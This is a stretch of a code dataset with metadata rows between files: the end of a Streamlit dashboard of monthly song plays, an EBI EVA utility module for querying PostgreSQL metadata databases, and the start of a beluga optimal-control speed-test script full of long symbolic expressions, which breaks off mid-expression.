        with MayData:
            st.header("May Data")
            st.dataframe(mayTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(mayTables[1])
            tabcol2.dataframe(mayTables[2])
            st.write(f"Total songs played in month: {totalSongsList[4]}")
        with JuneData:
            st.header("June Data")
            st.dataframe(junTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(junTables[1])
            tabcol2.dataframe(junTables[2])
            st.write(f"Total songs played in month: {totalSongsList[5]}")
        with JulyData:
            st.header("July Data")
            st.dataframe(julTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(julTables[1])
            tabcol2.dataframe(julTables[2])
            st.write(f"Total songs played in month: {totalSongsList[6]}")
        with AugustData:
            st.header("August Data")
            st.dataframe(augTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(augTables[1])
            tabcol2.dataframe(augTables[2])
            st.write(f"Total songs played in month: {totalSongsList[7]}")
        with SeptemberData:
            st.header("September Data")
            st.dataframe(sepTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(sepTables[1])
            tabcol2.dataframe(sepTables[2])
            st.write(f"Total songs played in month: {totalSongsList[8]}")
        with OctoberData:
            st.header("October Data")
            st.dataframe(octTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(octTables[1])
            tabcol2.dataframe(octTables[2])
            st.write(f"Total songs played in month: {totalSongsList[9]}")
        with NovemberData:
            st.header("November Data")
            st.dataframe(novTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(novTables[1])
            tabcol2.dataframe(novTables[2])
            st.write(f"Total songs played in month: {totalSongsList[10]}")
        with DecemberData:
            st.header("December Data")
            st.dataframe(decTables[0])
            tabcol1,tabcol2 = st.beta_columns(2)
            tabcol1.dataframe(decTables[1])
            tabcol2.dataframe(decTables[2])
            st.write(f"Total songs played in month: {totalSongsList[11]}")
| 37.828924 | 156 | 0.582032 |
ace09f42906f4bba75541a701b93ae5149d0ec47 | 3,882 | py | Python | ebi_eva_common_pyutils/metadata_utils.py | apriltuesday/eva-common-pyutils | 2f7794395b905981db692db56170a1bf224a96d7 | [
"Apache-2.0"
] | null | null | null | ebi_eva_common_pyutils/metadata_utils.py | apriltuesday/eva-common-pyutils | 2f7794395b905981db692db56170a1bf224a96d7 | [
"Apache-2.0"
] | null | null | null | ebi_eva_common_pyutils/metadata_utils.py | apriltuesday/eva-common-pyutils | 2f7794395b905981db692db56170a1bf224a96d7 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 EMBL - European Bioinformatics Institute
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from urllib.parse import urlsplit
import psycopg2
from ebi_eva_common_pyutils.config_utils import get_metadata_creds_for_profile
from ebi_eva_common_pyutils.pg_utils import get_result_cursor, get_all_results_for_query
def get_metadata_connection_handle(profile, settings_xml_file):
    """Open a psycopg2 connection to the metadata Postgres database.

    Credentials for the given profile are read from *settings_xml_file* via
    get_metadata_creds_for_profile; the database name is taken from the path
    component of the returned URL.
    """
    url, user, password = get_metadata_creds_for_profile(profile, settings_xml_file)
    dbname = urlsplit(url).path
    return psycopg2.connect(dbname, user=user, password=password)
def get_db_conn_for_species(species_db_info):
    """Open a psycopg2 connection to the dbSNP mirror database for one species.

    :param species_db_info: dict with at least the keys "dbsnp_build",
        "pg_host" and "pg_port"; the target database is "dbsnp_<build>" and
        the connection is made as the "dbsnp" user.
    :return: an open psycopg2 connection (caller is responsible for closing it).
    """
    db_name = "dbsnp_{0}".format(species_db_info["dbsnp_build"])
    # Pass connection parameters as keywords so the driver handles quoting,
    # instead of interpolating values into a DSN string (which breaks on
    # values containing spaces or quotes).
    return psycopg2.connect(dbname=db_name, user="dbsnp",
                            host=species_db_info["pg_host"],
                            port=species_db_info["pg_port"])
def get_species_info(metadata_connection_handle, dbsnp_species_name="all"):
    """List dbSNP/Ensembl species known to the metadata database.

    :param metadata_connection_handle: open connection to the metadata DB.
    :param dbsnp_species_name: restrict the result to one database_name, or
        "all" (default) for every species.
    :return: list of dicts with keys database_name, scientific_name,
        dbsnp_build, pg_host and pg_port.
    """
    query = ("select distinct database_name, scientific_name, dbsnp_build, pg_host, pg_port from "
             "dbsnp_ensembl_species.import_progress a "
             "join dbsnp_ensembl_species.dbsnp_build_instance b "
             "on b.dbsnp_build = a.ebi_pg_dbsnp_build ")
    if dbsnp_species_name != "all":
        # NOTE(review): the species name is interpolated straight into SQL;
        # acceptable for trusted internal names, but parameterize if this
        # value can ever come from user input.
        query += "where database_name = '{0}' ".format(dbsnp_species_name)
    query += "order by database_name"
    cursor = get_result_cursor(metadata_connection_handle, query)
    columns = ("database_name", "scientific_name", "dbsnp_build", "pg_host", "pg_port")
    species_set = [dict(zip(columns, row)) for row in cursor.fetchall()]
    cursor.close()
    return species_set
# Get connection information for each Postgres instance of the dbSNP mirror
def get_dbsnp_mirror_db_info(pg_metadata_dbname, pg_metadata_user, pg_metadata_host):
    """Return one dict per dbSNP mirror instance listed in
    dbsnp_ensembl_species.dbsnp_build_instance, with keys "dbsnp_build",
    "pg_host" and "pg_port".
    """
    dsn = "dbname='{0}' user='{1}' host='{2}'".format(pg_metadata_dbname, pg_metadata_user,
                                                      pg_metadata_host)
    query = "select * from dbsnp_ensembl_species.dbsnp_build_instance"
    with psycopg2.connect(dsn) as pg_conn:
        # Only the first three columns (build, host, port) are used.
        return [{"dbsnp_build": row[0], "pg_host": row[1], "pg_port": row[2]}
                for row in get_all_results_for_query(pg_conn, query)]
def get_variant_warehouse_db_name_from_assembly_and_taxonomy(metadata_connection_handle, assembly, taxonomy):
    """Resolve the variant warehouse database name for an assembly/taxonomy pair.

    :param metadata_connection_handle: open connection to the metadata DB.
    :param assembly: assembly accession (e.g. "GCA_...").
    :param taxonomy: taxonomy id (integer).
    :return: "eva_<taxonomy_code>_<assembly_code>", or None when no matching
        row exists.
    :raises ValueError: when the pair maps to more than one database.
    """
    # NOTE(review): assembly/taxonomy are interpolated straight into SQL;
    # fine for trusted internal accessions, but parameterize if these values
    # can ever come from user input.
    # Fix: the original concatenation omitted the space between
    # "...'{assembly}'" and "and ...", relying on the closing quote to
    # terminate the SQL token.
    query = f"select t.taxonomy_code, a.assembly_code " \
            f"from assembly a " \
            f"left join taxonomy t on (t.taxonomy_id = a.taxonomy_id) " \
            f"where a.assembly_accession = '{assembly}' " \
            f"and a.taxonomy_id = {taxonomy}"
    rows = get_all_results_for_query(metadata_connection_handle, query)
    if len(rows) == 0:
        return None
    elif len(rows) > 1:
        options = ', '.join(f'{r[0]}_{r[1]}' for r in rows)
        raise ValueError(f'More than one possible database for assembly {assembly} and taxonomy {taxonomy} found: '
                         f'{options}')
    return f'eva_{rows[0][0]}_{rows[0][1]}'
ace09f44229c99d57942130892e4f0ccc4bd59aa | 48,786 | py | Python | examples/Nolan/AFRL/Carts/SpeedTest4.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | d14713d8211b64293c4427005cf02fbd58630598 | [
"MIT"
] | 1 | 2019-03-26T03:00:03.000Z | 2019-03-26T03:00:03.000Z | examples/Nolan/AFRL/Carts/SpeedTest4.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | d14713d8211b64293c4427005cf02fbd58630598 | [
"MIT"
] | null | null | null | examples/Nolan/AFRL/Carts/SpeedTest4.py | Rapid-Design-of-Systems-Laboratory/beluga-legacy | d14713d8211b64293c4427005cf02fbd58630598 | [
"MIT"
] | 1 | 2019-07-14T22:53:52.000Z | 2019-07-14T22:53:52.000Z | import numpy as np
from beluga.utils.math import *
from beluga.utils.tictoc import *
# Scenario constants for the cost/dynamics speed benchmark below.
# NOTE(review): names suggest an EKF bearings/range tracking setup --
# sig* appear only squared (so presumably noise standard deviations),
# *_n look like nominal state/covariance values, *_s like scale factors,
# and lam*_N like terminal costates. TODO confirm against the problem spec.
tf = 1  # time factor multiplying every dynamics term below
Dt = 0.1  # discrete time step
sigv = 0.1  # appears as Dt*sigv**2 in the expressions
sigw = 0.1  # appears as Dt*sigw**2
sigr = 0.1  # appears as Dt*sigr**2 (range measurement?)
w = 3.1415/2  # unused in the visible benchmark loops
xb = 5  # fixed beacon/base x position (appears in x - xb offsets)
yb = 5  # fixed beacon/base y position
u_max = 0.1  # unused in the visible benchmark loops
v = 30  # speed; multiplies sin/cos(theta) terms
# Nominal (scaled) state values.
x_n = 100
y_n = 1e-4
theta_n = 0.1
# Nominal covariance entries P_ij.
p11_n = 1e5
p12_n = 1e5
p13_n = 1e5
p22_n = 1e5
p23_n = 1e5
p33_n = 1e5
# Terminal costate values.
lamX_N = 50
lamY_N = -100
lamTHETA_N = 2
lamP11_N = 1
lamP12_N = 1
lamP13_N = 1
lamP22_N = 1
lamP23_N = 1
lamP33_N = 1
# Scale factors paired with the corresponding *_n nominal quantities.
x_s = 1
y_s = 1
theta_s = 1
p11_s = 1e-3
p12_s = 1e-3
p13_s = 1e-3
p22_s = 1e-1
p23_s = 1e-2
p33_s = 1e-3
ep = 5  # unused in the visible benchmark loops
tic()
for i in range(1000):
fx = np.array([
(tf)*(-lamP11_N*(p11_n*p11_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + 
p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p11_n*p11_s*x_s/sqrt((x_n*x_s 
- xb)**2 + (y_n*y_s - yb)**2) - p12_n*p12_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p13_s - lamP22_N*(p12_n*p12_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p22_s - lamP23_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - 
yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p12_n*p12_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p22_n*p22_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p12_n*p12_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) - p22_n*p22_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p23_s - lamP33_N*(p13_n*p13_s*x_s*(x_n*x_s - xb)**2*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*x_s*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p13_n*p13_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p13_n*p13_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - 
xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p13_n*p13_s*x_s*(x_n*x_s - xb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p13_n*p13_s*x_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p13_n*p13_s*x_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p33_s),
(tf)*(-lamP11_N*(p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p11_n*p11_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p12_n*p12_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p12_n*p12_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p11_s - lamP12_N*(p12_n*p12_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p12_n*p12_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + 
p22_n*p22_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p22_n*p22_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p22_n*p22_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)))/p12_s - lamP13_N*(p13_n*p13_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p13_n*p13_s*(x_n*x_s - xb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s - yb)**2/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) + p12_n*p12_s*y_s/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) + p23_n*p23_s*y_s*(y_n*y_s - yb)**2*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2)) - p23_n*p23_s*y_s*(p11_n*p11_s*(x_n*x_s - xb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2) + p12_n*p12_s*(y_n*y_s - yb)/sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2))/(Dt*sigr**2*sqrt((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)) - p23_n*p23_s*(y_n*y_s - yb)*(-p11_n*p11_s*y_s*(x_n*x_s - xb)*(y_n*y_s - yb)/((x_n*x_s - xb)**2 + (y_n*y_s - yb)**2)**(3/2) - p12_n*p12_s*y_s*(y_n*y_s 
